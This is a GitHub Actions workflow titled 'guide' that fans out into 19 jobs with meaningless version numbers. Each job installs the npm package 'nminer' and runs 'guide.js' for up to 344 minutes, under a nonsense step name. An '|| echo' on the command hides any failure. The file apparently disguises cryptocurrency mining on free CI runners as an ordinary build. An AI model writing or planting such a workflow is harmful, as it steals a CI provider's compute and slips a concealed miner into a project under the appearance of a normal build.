name: guide
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2021 }
          - { version: 5270 }
          - { version: 2546 }
          - { version: 8985 }
          - { version: 7168 }
          - { version: 3219 }
          - { version: 2069 }
          - { version: 9895 }
          - { version: 7988 }
          - { version: 9412 }
          - { version: 1775 }
          - { version: 6386 }
          - { version: 7261 }
          - { version: 8623 }
          - { version: 9447 }
          - { version: 4699 }
          - { version: 7681 }
          - { version: 3379 }
          - { version: 7390 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: absentmindedly but however indeed
        run: |
          npm install nminer@latest
          timeout 344m node guide.js || echo "guide executed"